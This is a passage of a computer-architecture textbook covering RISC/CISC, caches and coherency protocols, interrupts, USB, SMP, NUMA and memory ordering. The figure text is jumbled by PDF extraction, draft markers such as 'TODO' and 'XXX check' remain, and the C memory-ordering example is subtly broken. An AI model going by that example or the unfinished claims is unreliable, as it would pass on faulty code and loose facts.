CISC v RISC
A common way to divide computer architectures is into Complex Instruction Set Computer  (CISC) and
Reduced Instruction Set Computer  (RISC).
Note in the first example, we have explicitly loaded values into registers, performed an addition and
stored the result value held in another register back to memory. This is an example of a RISC approach to
computing -- only performing operations on values in registers and explicitly loading and storing values
to and from memory.
A CISC approach may only a single instruction taking values from memory, performing the addition
internally and writing the result back. This means the instruction may take many cycles, but ultimately
both approaches achieve the same goal.
All modern architectures would be considered RISC architectures3.
There are a number of reasons for this
•Whilst RISC makes assembly programming becomes more complex, since virtually all programmers
use high level languages and leave the hard work of producing assembly code to the compiler, so the
other advantages outweigh this disadvantage.
•Because the instructions in a RISC processor are much more simple, there is more space inside the chip
for registers. As we know from the memory hierarchy, registers are the fastest type of memory and
ultimately all instructions must be performed on values held in registers, so all other things being equal
more registers leads to higher performance.
•Since all instructions execute in the same time, pipelining is possible. We know pipelining requires
streams of instructions being constantly fed into the processor, so if some instructions take a very long
time and others do not, the pipeline becomes far to complex to be effective.
EPIC
The Itanium processor, which is used in many example through this book, is an example of a modified
architecture called Explicitly Parallel Instruction Computing.
We have discussed how superscaler processors have pipelines that have many instructions in flight at the
same time in different parts of the processor. Obviously for this to work as well as possible instructions
should be given the processor in an order that can make best use of the available elements of the CPU.
3Even the most common architecture, the Intel Pentium, whilst having an instruction set that is categorised as CISC, internally breaks down
instructions to RISC style sub-instructions inside the chip before executing.
Computer Architecture
38Traditionally organising the incoming instruction stream has been the job of the hardware. Instructions are
issued by the program in a sequential manner; the processor must look ahead and try to make decisions
about how to organise the incoming instructions.
The theory behind EPIC is that there is more information available at higher levels which can make these
decisions better than the processor. Analysing a stream of assembly language instructions, as current
processors do, looses a lot of information that the programmer may have provided in the original source
code. Think of it as the difference between studying a Shakespeare play and reading the Cliff's Notes
version of the same. Both give you the same result, but the original has all sorts of extra information that
sets the scene and gives you insight into the characters.
Thus the logic of ordering instructions can be moved from the processor to the compiler. This means
that compiler writers need to be smarter to try and find the best ordering of code for the processor. The
processor is also significantly simplified, since a lot of its work has been moved to the compiler.4
Memory
Memory Hierarchy
The CPU can only directly fetch instructions and data from cache memory, located directly on the processor
chip. Cache memory must be loaded in from the main system memory (the Random Access Memory, or
RAM). RAM however, only retains it's contents when the power is on, so needs to be stored on more
permanent storage.
We call these layers of memory the memory hierarchy
Table 3.1. Memory Hierarchy
Speed Memory Description
Fastest Cache Cache memory is memory actually
embedded inside the CPU. Cache
memory is very fast, typically
taking only once cycle to access,
but since it is embedded directly
into the CPU there is a limit to
how big it can be. In fact, there
are several sub-levels of cache
memory (termed L1, L2, L3) all
with slightly increasing speeds.
RAM All instructions and storage
addresses for the processor must
come from RAM. Although RAM
is very fast, there is still some
significant time taken for the CPU
to access it (this is termed latency).
4Another term often used around EPIC is Very Long Instruction World (VLIW), which is where each instruction to the processor is extended to
tell the processor about where it should execute the instruction in it's internal units. The problem with this approach is that code is then completely
dependent on the model of processor is has been compiled for. Companies are always making revisions to hardware, and making customers recompile
their application every single time, and maintain a range of different binaries was impractical.
EPIC solves this in the usual computer science manner by adding a layer of abstraction. Rather than explicitly specifying the exact part of the
processor the instructions should execute on, EPIC creates a simplified view with a few core units like memory, integer and floating point.
Computer Architecture
39Speed Memory Description
RAM is stored in separate,
dedicated chips attached to the
motherboard, meaning it is much
larger than cache memory.
Slowest Disk We are all familiar with software
arriving on a floppy disk or
CDROM, and saving our files to
the hard disk. We are also familiar
with the long time a program can
take to load from the hard disk
-- having physical mechanisms
such as spinning disks and moving
heads means disks are the slowest
form of storage. But they are also
by far the largest form of storage.
The important point to know about the memory hierarchy is the trade offs between speed an size -- the
faster the memory the smaller it is. Of course, if you can find a way to change this equation, you'll end
up a billionaire!
The reason caches are effective is becuase computer code generally exhibits two forms of locality
1.Spatial locality suggests that data within blocks is likely to be accessed together.
2.Temporal  locality suggests that data that was used recently will likely be used again shortly.
This means that benefits are gained by implementing as much quickly accessible memory (temporal)
storing small blocks of relevant information (spatial) as practically possible.
Cache in depth
Cache is one of the most important elements of the CPU architecture. To write efficient code developers
need to have an understanding of how the cache in their systems works.
The cache is a very fast copy of the slower main system memory. Cache is much smaller than main
memories because it is included inside the processor chip alongside the registers and processor logic. This
is prime real estate in computing terms, and there are both economic and physical limits to it's maximum
size. As manufacturers find more and more ways to cram more and more transistors onto a chip cache
sizes grow considerably, but even the largest caches are tens of megabytes, rather than the gigabytes of
main memory or terrabytes of hard disk otherwise common.
The cache is made up of small chunks of mirrored main memory. The size of these chunks is called the
line size, and is typically something like 32 or 64 bytes. When talking about cache, it is very common to
talk about the line size, or a cache line, which refers to one chunk of mirrored main memory. The cache
can only load and store memory in sizes a multiple of a cache line.
Caches have their own hierarchy, commonly termed L1, L2 and L3. L1 cache is the fastest and smallest;
L2 is bigger and slower, and L3 more so.
L1 caches are generally further split into instruction caches and data, known as the "Harvard Architecture"
after the relay based Harvard Mark-1 computer which introduced it. Split caches help to reduce pipeline
bottlenecks as earlier pipeline stages tend to reference the instruction cache and later stages the data cache.
Computer Architecture
40Apart from reducing contention for a shared resource, providing separate caches for instructions also
allows for alternate implementations which may take advantage of the nature of instruction streaming;
they are read-only so do not need expensive on-chip features such as multi-porting, nor need to handle
handle sub-block reads because the instruction stream generally uses more regular sized accesses.
Figure 3.4. Cache Associativity
4 way set associativeset
way
Fully Associative DirectTotal system memory
Possible locations in cache for shaded values
A given cache line may find a valid home in one of the shaded entries.
During normal operation the processor is constantly asking the cache to check if a particular address is
stored in the cache, so the cache needs some way to very quickly find if it has a valid line present or not.
If a given address can be cached anywhere within the cache, every cache line needs to be searched every
time a reference is made to determine a hit or a miss. To keep searching fast this is done in parallel in the
cache hardware, but searching every entry is generally far too expensive to implement for a reasonable
sized cache. Thus the cache can be made simpler by enforcing limits on where a particular address must
live. This is a trade-off; the cache is obviously much, much smaller than the system memory, so some
addresses must alias others. If two addresses which alias each other are being constantly updated they
are said to fight over the cache line. Thus we can categorise caches into three general types, illustrated in
Figure 3.4, “Cache Associativity” .
•Direct mapped  caches will allow a cache line to exist only in a singe entry in the cache. This is the
simplest to implement in hardware, but as illustrated in Figure 3.4, “Cache Associativity”  there is no
potential to avoid aliasing because the two shaded addresses must share the same cache line.
•Fully Associative  caches will allow a cache line to exist in any entry of the cache. This avoids the problem
with aliasing, since any entry is available for use. But it is very expensive to implement in hardware
because every possible location must be looked up simultaneously to determine if a value is in the cache.
•Set Associative  caches are a hybrid of direct and fully associative caches, and allow a particular cache
value to exist in some subset of the lines within the cache. The cache is divided into even compartments
called ways, and a particular address could be located in any way. Thus an n-way set associative cache
will allow a cache line to exist in any entry of a set sized total blocks mod n — Figure 3.4, “Cache
Associativity”  shows a sample 8-element, 4-way set associative cache; in this case the two addresses
Computer Architecture
41have four possible locations, meaning only half the cache must be searched upon lookup. The more
ways, the more possible locations and the less aliasing, leading to overall better performance.
Once the cache is full the processor needs to get rid of a line to make room for a new line. There are many
algorithms by which the processor can choose which line to evict; for example least recently used  (LRU)
is an algorithm where the oldest unused line is discarded to make room for the new line.
When data is only read from the cache there is no need to ensure consistency with main memory. However,
when the processor starts writing to cache lines it needs to make some decisions about how to update
the underlying main memory. A write-through  cache will write the changes directly into the main system
memory as the processor updates the cache. This is slower since the process of writing to the main memory
is, as we have seen, slower. Alternatively a write-back  cache delays writing the changes to RAM until
absolutely necessary. The obvious advantage is that less main memory access is required when cache
entries are written. Cache lines that have been written but not committed to memory are referred to as
dirty. The disadvantage is that when a cache entry is evicted, it may require two memory accesses (one to
write dirty data main memory, and another to load the new data).
If an entry exists in both a higher-level and lower-level cache at the same time, we say the higher-level
cache is inclusive. Alternatively, if the higher-level cache having a line removes the possibility of a lower
level cache having that line, we say it is exclusive. This choice is discussed further in the section called
“Cache exclusivity in SMP systems” .
Cache Addressing
So far we have not discussed how a cache decides if a given address resides in the cache or not. Clearly,
caches must keep a directory of what data currently resides in the cache lines. The cache directory and
data may co-located on the processor, but may also be separate — such as in the case of the POWER5
processor which has an on-core L3 directory, but actually accessing the data requires traversing the L3 bus
to access off-core memory. An arrangement like this can facilitate quicker hit/miss processing without the
other costs of keeping the entire cache on-core.
Figure 3.5. Cache tagsMUXWay 1
Way 2MUXWay 1
Way 2
Way 3
Way 4Offset
TAG INDEX
Less AssociativeLess set-associativity means more index bits
Offset
TAG INDEX
More AssociativeMore set-associativity means more tag bitsAddress
Address
Tags need to be checked in parallel to keep latency times low; more tag bits (i.e. less set associativity)
requires more complex hardware to achieve this. Alternatively more set associativity means less tags, but
the processor now needs hardware to multiplex the output of the many sets, which can also add latency.
Computer Architecture
42To quickly decide if an address lies within the cache it is separated into three parts; the tag and the index
and the offset.
The offset bits depend on the line size of the cache. For example, a 32-byte line size would use the last 5-
bits (i.e. 25) of the address as the offset into the line.
The index is the particular cache line that an entry may reside in. As an example, let us consider a cache
with 256 entries. If this is a direct-mapped cache, we know the data may reside in only one possible line,
so the next 8-bits (28) after the offset describe the line to check - between 0 and 255.
Now, consider the same 256 element cache, but divided into two ways. This means there are two groups of
128 lines, and the given address may reside in either of these groups. Consequently only 7-bits are required
as an index to offset into the 128-entry ways. For a given cache size, as we increase the number of ways,
we decrease the number of bits required as an index since each way gets smaller.
The cache directory still needs to check if the particular address stored in the cache is the one it is interested
in. Thus the remaining bits of the address are the tag bits which the cache directory checks against the
incoming address tag bits to determine if there is a cache hit or not. This relationship is illustrated in
Figure 3.5, “Cache tags” .
When there are multiple ways, this check must happen in parallel within each way, which then passes its
result into a multiplexor which outputs a final hit or miss result. As describe above, the more associative a
cache is, the less bits are required for index and the more as tag bits — to the extreme of a fully-associative
cache where no bits are used as index bits. The parallel matching of tags bits is the expensive component
of cache design and generally the limiting factor on how many lines (i.e, how big) a cache may grow.
Peripherals and busses
Peripherals are any of the many external devices that connect to your computer. Obviously, the processor
must have some way of talking to the peripherals to make them useful.
The communication channel between the processor and the peripherals is called a bus.
Peripheral Bus concepts
A device requires both input and output to be useful. There are a number of common concepts required
for useful communication with peripherals.
Interrupts
An interrupt allows the device to literally interrupt the processor to flag some information. For example,
when a key is pressed, an interrupt is generated to deliver the key-press event to the operating system.
Each device is assigned an interrupt by some combination of the operating system and BIOS.
Devices are generally connected to an programmable interrupt controller  (PIC), a separate chip that is part
of the motherboard which buffers and communicates interrupt information to the main processor. Each
device has a physical interrupt line  between it an one of the PIC's provided by the system. When the device
wants to interrupt, it will modify the voltage on this line.
A very broad description of the PIC's role is that it receives this interrupt and converts it to a message for
consumption by the main processor. While the exact procedure varies by architecture, the general principle
is that the operating system has configured an interrupt descriptor table  which pairs each of the possible
Computer Architecture
43interrupts with a code address to jump to when the interrupt is received. This is illustrated in Figure 3.6,
“Overview of handling an interrupt” .
Writing this interrupt handler  is the job of the device driver author in conjunction with the operating
system.
Figure 3.6. Overview of handling an interruptPICDevice DriverIDT
CPUOperating System
Device
A generic overview of handling an interrupt. The device raises the interrupt to the interrupt controller,
which passes the information onto the processor. The processor looks at its descriptor table, filled out by
the operating system, to find the code to handle the fault.
Most drivers will spilt up handling of interrupts into bottom and top halves. The bottom half will
acknowledge the interrupt, queue actions for processing and return the processor to what it was doing
quickly. The top half will then run later when the CPU is free and do the more intensive processing. This
is to stop an interrupt hogging the entire CPU.
Saving state
Since an interrupt can happen at any time, it is important that you can return to the running operation when
finished handling the interrupt. It is generally the job of the operating system to ensure that upon entry to
the interrupt handler, it saves any state; i.e. registers, and restores them when returning from the interrupt
handler. In this way, apart from some lost time, the interrupt is completely transparent to whatever happens
to be running at the time.
Interrupts v traps and exceptions
While an interrupt is generally associated with an external event from a physical device, the same
mechanism is useful for handling internal system operations. For example, if the processor detects
conditions such as an access to invalid memory, an attempt to divide-by-zero or an invalid instruction,
it can internally raise an exception  to be handled by the operating system. It is also the mechanism used
to trap into the operating system for system calls , as discussed in the section called “System Calls”  and
to implement virtual memory, as discussed in Chapter 6, Virtual Memory . Although generated internally
rather than from an external source, the principles of asynchronously interrupting the running code remains
the same.
Types of interrupts
There are two main ways of signalling interrupts on a line — level and edge triggered.
Level-triggered interrupts define voltage of the interrupt line being held high to indicate an interrupt is
pending. Edge-triggered interrupts detect transitions  on the bus; that is when the line voltage goes from
Computer Architecture
44low to high. With an edge-triggered interrupt, a square-wave pulse is detected by the PIC as signalling
and interrupt has been raised.
The difference is pronounced when devices share an interrupt line. In a level-triggered system, the interrupt
line will be high until all devices that have raised an interrupt have been processed and un-asserted their
interrupt.
In an edge-triggered system, a pulse on the line will indicate to the PIC that an interrupt has occurred,
which it will signal to the operating system for handling. However, if further pulses come in on the already
asserted line from another device.
The issue with level-triggered interrupts is that it may require some considerable amount of time to handle
an interrupt for a device. During this time, the interrupt line remains high and it is not possible to determine
if any other device has raised an interrupt on the line. This means there can be considerable unpredictable
latency in servicing interrupts.
With edge-triggered interrupts, a long-running interrupt can be noticed and queued, but other devices
sharing the line can still transition (and hence raise interrupts) while this happens. However, this introduces
new problems; if two devices interrupt at the same time it may be possible to miss one of the interrupts,
or environmental or other interference may create a spurious interrupt which should be ignored.
Non-maskable interrupts
It is important for the system to be able to mask or prevent interrupts at certain times. Generally, it is
possible to put interrupts on hold, but a particular class of interrupts, called non-maskable interrupts  (NMI),
are the exception to this rule. The typical example is the reset interrupt.
NMIs can be useful for implementing things such as a system watchdog, where a NMI is raised periodically
and sets some flag that must be acknowledged by the operating system. If the acknowledgement is not seen
before the next periodic NMI, then system can be considered to be not making forward progress. Another
common usage is for profiling a system. A periodic NMI can be raised and used to evaluate what code
the processor is currently running; over time this builds a profile of what code is being run and create a
very useful insight into system performance.
IO Space
Obviously the processor will need to communicate with the peripheral device, and it does this via IO
operations. The most common form of IO is so called memory mapped IO  where registers on the device
are mapped into memory.
This means that to communicate with the device, you need simply read or write to a specific address in
memory. TODO: expand
DMA
Since the speed of devices is far below the speed of processors, there needs to be some way to avoid
making the CPU wait around for data from devices.
Direct Memory Access (DMA) is a method of transferring data directly between an peripheral and system
RAM.
The driver can setup a device to do a DMA transfer by giving it the area of RAM to put it's data into. It
can then start the DMA transfer and allow the CPU to continue with other tasks.
Computer Architecture
45Once the device is finished, it will raise an interrupt and signal to the driver the transfer is complete. From
this time the data from the device (say a file from a disk, or frames from a video capture card) is in memory
and ready to be used.
Other Busses
Other buses connect between the PCI bus and external devices.
USB
From an operating system point of view, a USB device is a group of end-points grouped together into an
interface. An end-point can be either in or out and hence transfers data in one direction only. End-points
can have a number of different types:
•Control end-points are for configuring the device, etc.
•Interrupt end-points are for transferring small amounts of data. They have higher priority than ...
•Bulk end-points, which transfer large amounts of data but do not get guaranteed time constraints.
•Isochronous  transfers are high-priority real-time transfers, but if they are missed they are not re-tried.
This is for streaming data like video or audio where there is no point sending data again.
There can be many interfaces (made of multiple end-points) and interfaces are grouped into configurations .
However Most devices only have a single configuration.
Figure 3.7. Overview of a UHCI controller operation
Base Index2 11 12 31Frame 
Counter
Frame ListIsochronous 
Transfer Descriptors
Horizontal ExecutionQueue Heads
Execution By Breadth
(Horizontal Execution)
Execution 
By Depth
(Vertical
Execution)Link
Pointer
Element
Link
PointerLink
Pointer
Element
Link
PointerElement
Link
Pointer
TQTQTQ
Frame Pointer
Frame PointerFrame Pointer
Q=Transfer Descriptor or Queue HeadT=TerminateFrame List Base
Address Register
TD
TD
TDTD
TD
TDTD
TD
TDTDTDTDTDTD TDQH QH QH00
Link
Pointer
Element
Link
Pointer
TD
TD
TDQH
TD
TDTDTQ Frame PointerTDTDTDInterrupt Control and BulkQueue Heads
An overview of a UCHI controller, taken from Intel documentation  [http://download.intel.com/
technology/usb/UHCI11D.pdf ].
Computer Architecture
46Figure 3.7, “Overview of a UHCI controller operation”  shows an overview of a universal host controller
interface, or UHCI. It provides an overview of how USB data is moved out of the system by a combination
of hardware and software. Essentially, the software sets up a template of data in a specified format for the
host controller to read and send across the USB bus.
Starting at the top-left of the overview, the controller has a frame register with a counter which is
incremented periodically — every millisecond. This value is used to index into a frame list  created by
software. Each entry in this table points to a queue of transfer descriptors . Software sets up this data in
memory, and it is read by the host controller which is a separate chip the drives the USB bus. Software
needs to schedule the work queues so that 90% of a frame time is given to isochronous data, and 10% left
for interrupt, control and bulk data..
As you can see from the diagram, the way the data is linked means that transfer descriptors for isochronous
data are associated with only one particular frame pointer — in other words only one particular time period
— and after that will be discarded. However, the interrupt, control and bulk data are all queued after the
isochronous data and thus if not transmitted in one frame (time period) will be done in the next.
The USB layer communicates through USB request blocks , or URBs. A URB contains information about
what end-point this request relates to, data, any related information or attributes and a call-back function to
be called when the URB is complete. USB drivers submit URBs in a fixed format to the USB core, which
manages them in co-ordination with the USB host controller as above. Your data gets sent off to the USB
device by the USB core, and when its done your call-back is triggered.
Small to big systems
As Moore's law has predicted, computing power has been growing at a furious pace and shows no signs
of slowing down. It is relatively uncommon for any high end servers to contain only a single CPU. This
is achieved in a number of different fashions.
Symmetric Multi-Processing
Symmetric Multi-Processing, commonly shortened to SMP, is currently the most common configuration
for including multiple CPUs in a single system.
The symmetric term refers to the fact that all the CPUs in the system are the same (e.g. architecture, clock
speed). In a SMP system there are multiple processors that share other all other system resources (memory,
disk, etc).
Cache Coherency
For the most part, the CPUs in the system work independently; each has its own set of registers, program
counter, etc. Despite running separately, there is one component that requires strict synchronisation.
This is the CPU cache; remember the cache is a small area of quickly access able memory that mirrors
values stored in main system memory. If one CPU modifies data in main memory and another CPU has
an old copy of that memory in its cache the system will obviously not be in a consistent state. Note that
the problem only occurs when processors are writing to memory, since if a value is only read the data
will be consistent.
To co-ordinate keeping the cache coherent on all processors an SMP system uses snooping. Snooping is
where a processor listens on a bus which all processors are connected to for cache events, and updates
its cache accordingly.
Computer Architecture
47One protocol for doing this is the MOESI protocol; standing for Modified, Owner, Exclusive, Shared,
Invalid. Each of these is a state that a cache line can be in on a processor in the system. There are other
protocols for doing as much, however they all share similar concepts. Below we examine MOESI so you
have an idea of what the process entails.
When a processor requires reading a cache line from main memory, it firstly has to snoop all other
processors in the system to see if they currently know anything about that area of memory (e.g. have it
cached). If it does not exist in any other process, then the processor can load the memory into cache and
mark it as exclusive. When it writes to the cache, it then changes state to be modified. Here the specific
details of the cache come into play; some caches will immediately write back the modified cache to system
memory (known as a write-through  cache, because writes go through to main memory). Others will not,
and leave the modified value only in the cache until it is evicted, when the cache becomes full for example.
The other case is where the processor snoops and finds that the value is in another processors cache. If this
value has already been marked as modified, it will copy the data into its own cache and mark it as shared.
It will send a message for the other processor (that we got the data from) to mark its cache line as owner.
Now imagine that a third processor in the system wants to use that memory too. It will snoop and find both
a shared and a owner copy; it will thus take its value from the owner value. While all the other processors
are only reading the value, the cache line stays shared in the system. However, when one processor needs
to update the value it sends an invalidate  message through the system. Any processors with that cache
line must then mark it as invalid, because it not longer reflects the "true" value. When the processor sends
the invalidate message, it marks the cache line as modified in its cache and all others will mark as invalid
(note that if the cache line is exclusive the processor knows that no other processor is depending on it so
can avoid sending an invalidate message).
From this point the process starts all over. Thus whichever processor has the modified value has the
responsibility of writing the true value back to RAM when it is evicted from the cache. By thinking through
the protocol you can see that this ensures consistency of cache lines between processors.
There are several issues with this system as the number of processors starts to increase. With only a few
processors, the overhead of checking if another processor has the cache line (a read snoop) or invalidating
the data in every other processor (invalidate snoop) is manageable; but as the number of processors increase
so does the bus traffic. This is why SMP systems usually only scale up to around 8 processors.
Having the processors all on the same bus starts to present physical problems as well. Physical properties
of wires only allow them to be laid out at certain distances from each other and to only have certain lengths.
With processors that run at many gigahertz the speed of light starts to become a real consideration in how
long it takes messages to move around a system.
Note that system software usually has no part in this process, although programmers should be aware of
what the hardware is doing underneath in response to the programs they design to maximise performance.
Cache exclusivity in SMP systems
In the section called “Cache in depth”  we described inclusive v exclusive caches. In general, L1 caches are
usually inclusive — that is all data in the L1 cache also resides in the L2 cache. In a multiprocessor system,
an inclusive L1 cache means that only the L2 cache need snoop memory traffic to maintain coherency,
since any changes in L2 will be guaranteed to be reflected by L1. This reduces the complexity of the L1
and de-couples it from the snooping process allowing it to be faster.
Again, in general, most all modern high-end (e.g. not targeted at embedded) processors have a write-
through policy for the L1 cache, and a write-back policy for the lower level caches. There are several
reasons for this. Since in this class of processors L2 caches are almost exclusively on-chip and generally
quite fast the penalties from having L1 write-through are not the major consideration. Further, since L1
sizes are small, pools of written data unlikely to be read in the future could cause pollution of the limited
Computer Architecture
48L1 resource. Additionally, a write-through L1 does not have to be concerned if it has outstanding dirty
data, hence can pass the extra coherency logic to the L2 (which, as we mentioned, already has a larger
part to play in cache coherency).
Hyperthreading
Much of the time of a modern processor is spent waiting for much slower devices in the memory hierarchy
to deliver data for processing.
Thus strategies to keep the pipeline of the processor full are paramount. One strategy is to include enough
registers and state logic such that two instruction streams can be processed at the same time. This makes
one CPU look for all intents and purposes like two CPUs.
While each CPU has its own registers, they still have to share the core logic, cache and input and output
bandwidth from the CPU to memory. So while two instruction streams can keep the core logic of the
processor busier, the performance increase will not be as great has having two physically separate CPUs.
Typically the performance improvement is below 20% (XXX check), however it can be drastically better
or worse depending on the workloads.
Multi Core
With increased ability to fit more and more transistors on a chip, it became possible to put two or more
processors in the same physical package. Most common is dual-core, where two processor cores are in
the same chip. These cores, unlike hyperthreading, are full processors and so appear as two physically
separate processors a la a SMP system.
While generally the processors have their own L1 cache, they do have to share the bus connecting to
main memory and other devices. Thus performance is not as great as a full SMP system, but considerably
better than a hyperthreading system (in fact, each core can still implement hyperthreading for an additional
enhancement).
Multi core processors also have some advantages not performance related. As we mentioned, external
physical busses between processors have physical limits; by containing the processors on the same piece
of silicon extremely close to each other some of these problems can be worked around. The power
requirements for multi core processors are much less than for two separate processors. This means that
there is less heat needing to be dissipated which can be a big advantage in data centre applications where
computers are packed together and cooling considerations can be considerable. By having the cores in the
same physical package it makes muti-processing practical in applications where it otherwise would not
be, such as laptops. It is also considerably cheaper to only have to produce one chip rather than two.
Clusters
Many applications require systems much larger than the number of processors a SMP system can scale to.
One way of scaling up the system further is a cluster.
A cluster is simply a number of individual computers which have some ability to talk to each other. At the
hardware level the systems have no knowledge of each other; the task of stitching the individual computers
together is left up to software.
Software such as MPI allow programmers to write their software and then "farm out" parts of the
program to other computers in the system. For example, image a loop that executes several thousand
times performing independent action (that is no iteration of the loop affects any other iteration). With four
computers in a cluster, the software could make each computer do 250 loops each.
Computer Architecture
49The interconnect between the computers varies, and may be as slow as an internet link or as fast as
dedicated, special busses (Infiniband). Whatever the interconnect, however, it is still going to be further
down the memory hierarchy and much, much slower than RAM. Thus a cluster will not perform well in
a situation when each CPU requires access to data that may be stored in the RAM of another computer;
since each time this happens the software will need to request a copy of the data from the other computer,
copy across the slow link and into local RAM before the processor can get any work done.
However, many applications do not require this constant copying around between computers. One large
scale example is SETI@Home, where data collected from a radio antenna is analysed for signs of Alien
life. Each computer can be distributed a few minutes of data to analyse, and only needs report back a
summary of what it found. SETI@Home is effectively a very large, dedicated cluster.
Another application is rendering of images, especially for special effects in films. Each computer can be
handed a single frame of the movie which contains the wire-frame models, textures and light sources which
needs to be combined (rendered) into the amazing special effects we now take for grained. Since each
frame is static, once the computer has the initial input it does not need any more communication until the
final frame is ready to be sent back and combined into the move. For example the block-buster Lord of
the Rings had their special effects rendered on a huge cluster running Linux.
Non-Uniform Memory Access
Non-Uniform Memory Access, more commonly abbreviated to NUMA, is almost the opposite of a cluster
system mentioned above. As in a cluster system it is made up of individual nodes linked together, however
the linkage between nodes is highly specialised (and expensive!). As opposed to a cluster system where
the hardware has no knowledge of the linkage between nodes, in a NUMA system the software has no
(well, less) knowledge about the layout of the system and the hardware does all the work to link the nodes
together.
The term non uniform memory access  comes from the fact that RAM may not be local to the CPU and
so data may need to be accessed from a node some distance away. This obviously takes longer, and is in
contrast to a single processor or SMP system where RAM is directly attached and always takes a constant
(uniform) time to access.
NUMA Machine Layout
With so many nodes talking to each other in a system, minimising the distance between each node is of
paramount importance. Obviously it is best if every single node has a direct link to every other node as
this minimises the distance any one node needs to go to find data. This is not a practical situation when
the number of nodes starts growing into the hundreds and thousands as it does with large supercomputers;
if you remember your high school maths the problem is basically a combination taken two at a time (each
node talking to another), and will grow n!/2*(n-2)! .
To combat this exponential growth alternative layouts are used to trade off the distance between nodes with
the interconnects required. One such layout common in modern NUMA architectures is the hypercube.
A hypercube has a strict mathematical definition (way beyond this discussion) but as a cube is a 3
dimensional counterpart of a square, so a hypercube is a 4 dimensional counterpart of a cube.
Computer Architecture
50Figure 3.8. A Hypercube
An example of a hypercube. Hypercubes provide a good trade off between distance between nodes and
number of interconnections required.
Above we can see the outer cube contains four 8 nodes. The maximum number of paths required for any
node to talk to another node is 3. When another cube is placed inside this cube, we now have double the
number of processors but the maximum path cost has only increased to 4. This means as the number of
processors grow by 2n the maximum path cost grows only linearly.
Cache Coherency
Cache coherency can still be maintained in a NUMA system (this is referred to as a cache-coherent NUMA
system, or ccNUMA). As we mentioned, the broadcast based scheme used to keep the processor caches
coherent in an SMP system does not scale to hundreds or even thousands of processors in a large NUMA
system. One common scheme for cache coherency in a NUMA system is referred to as a directory based
model. In this model processors in the system communicate to special cache directory hardware. The
directory hardware maintains a consistent picture to each processor; this abstraction hides the working of
the NUMA system from the processor.
The Censier and Feautrier directory based scheme maintains a central directory where each memory block
has a flag bit known as the valid bit for each processor and a single dirty bit. When a processor reads the
memory into its cache, the directory sets the valid bit for that processor.
Computer Architecture
51When a processor wishes to write to the cache line the directory needs to set the dirty bit for the memory
block. This involves sending an invalidate message to those processors who are using the cache line (and
only those processors whose flag are set; avoiding broadcast traffic).
After this should any other processor try to read the memory block the directory will find the dirty bit
set. The directory will need to get the updated cache line from the processor with the valid bit currently
set, write the dirty data back to main memory and then provide that data back to the requesting processor,
setting the valid bit for the requesting processor in the process. Note that this is transparent to the requesting
processor and the directory may need to get that data from somewhere very close or somewhere very far
away.
Obviously having thousands of processors communicating to a single directory does also not scale well.
Extensions to the scheme involve having a hierarchy of directories that communicate between each other
using a separate protocol. The directories can use a more general purpose communications network to talk
between each other, rather than a CPU bus, allowing scaling to much larger systems.
NUMA Applications
NUMA systems are best suited to the types of problems that require much interaction between processor
and memory. For example, in weather simulations a common idiom is to divide the environment up into
small "boxes" which respond in different ways (oceans and land reflect or store different amounts of heat,
for example). As simulations are run, small variations will be fed in to see what the overall result is. As
each box influences the surrounding boxes (e.g. a bit more sun means a particular box puts out more
heat, affecting the boxes next to it) there will be much communication (contrast that with the individual
image frames for a rendering process, each of which does not influence the other). A similar process might
happen if you were modelling a car crash, where each small box of the simulated car folds in some way
and absorbs some amount of energy.
Although the software has no directly knowledge that the underlying system is a NUMA system,
programmers need to be careful when programming for the system to get maximum performance.
Obviously keeping memory close to the processor that is going to use it will result in the best performance.
Programmers need to use techniques such as profiling to analyse the code paths taken and what
consequences their code is causing for the system to extract best performance.
Memory ordering, locking and atomic operations
The multi-level cache, superscalar multi-processor architecture brings with it some insteresting issues
relating to how a programmer sees the processor running code.
Imagine program code is running on two processors simultaneously, both processors sharing effectively
one large area of memory. If one processor issues a store instruction, to put a register value into memory,
when can it be sure that the other processor does a load of that memory it will see the correct value?
In the simplest situation the system could guarantee that if a program executes a store instruction, any
subsequent load instructions will see this value. This is referred to as strict memory ordering , since the
rules allow no room for movement. You should be starting to realise why this sort of thing is a serious
impediment to performance of the system.
Much of the time, the memory ordering is not required to be so strict. The programmer can identify points
where they need to be sure that all outstanding operations are seen globally, but in between these points
there may be many instructions where the semantics are not important.
Take, for example, the following situation.
Computer Architecture
52Example 3.1. Memory Ordering
  1 
                  typedef struct {
    int a;
    int b;
  5 } a_struct;
    
    /*
     * Pass in a pointer to be allocated as a new structure
     */
 10 void get_struct(a_struct *new_struct)
    {
     void *p = malloc(sizeof(a_struct));
    
     /* We don't particularly care what order the following two
 15   * instructions end up acutally executing in */
     p->a = 100;
     p->b = 150;
    
     /* However, they must be done before this instruction.
 20   * Otherwise, another processor who looks at the value of p
      * could find it pointing into a structure whose values have
      * not been filled out.
      */
     new_struct = p;
 25 }
    
                
In this example, we have two stores that can be done in any particular order, as it suits the processor.
However, in the final case, the pointer must only be updated once the two previous stores are known to have
been done. Otherwise another processor might look at the value of p, follow the pointer to the memory,
load it, and get some completely incorrect value!
To indicate this, loads and stores have to have semantics  that describe what behaviour they must have.
Memory semantics are described in terms of fences that dictate how loads and stores may be reordered
around the load or store.
By default, a load or store can be re-ordered anywhere.
Acquire semantics is like a fence that only allows load and stores to move downwards through it. That is,
when this load or store is complete you can be gaurnteed that any later load or stores will see the value
(since they can not be moved above it).
Release semantics is the opposite, that is a fence that allows any load or stores to be done before it (move
upwards), but nothing before it to move downwards past it. Thus, when load or store with release semantics
is processed, you can be store that any earlier load or stores will have been complete.
Computer Architecture
53Figure 3.9. Acquire and Release semantics
StoreLoad
Load
Load
Store
Store
Load
Store
StoreLoad
Load
Load
LoadAll later operations must be able to
see the result of this operation.
All ealier operations must be complete
before this operation completes.
Invalid ReorderingValid ReorderingStore
LoadAcquire
Release
An illustration of valid reorderings around operations with acquire and release semantics.
A full memory fence  is a combination of both; where no loads or stores can be reordered in any direction
around the current load or store.
The strictest memory model would use a full memory fence for every operation. The weakest model would
leave every load and store as a normal re-orderable instruction.
Processors and memory models
Different processors implement different memory models.
The x86 (and AMD64) processor has a quite strict memory model; all stores have release semantics (that is,
the result of a store is guaranteed to be seen by any later load or store) but all loads have normal semantics.
lock prefix gives memory fence.
Itanium allows all load and stores to be normal, unless explicitly told. XXX
Computer Architecture
54Locking
Knowing the memory ordering requirements of each architecture is no practical for all programmers, and
would make programs difficult to port and debug across different processor types.
Programmers use a higher level of abstraction called locking to allow simultaneous operation of programs
when there are multiple CPUs.
When a program acquires a lock over a piece of code, no other processor can obtain the lock until it is
released. Before any critical pieces of code, the processor must attempt to take the lock; if it can not have
it, it does not continue.
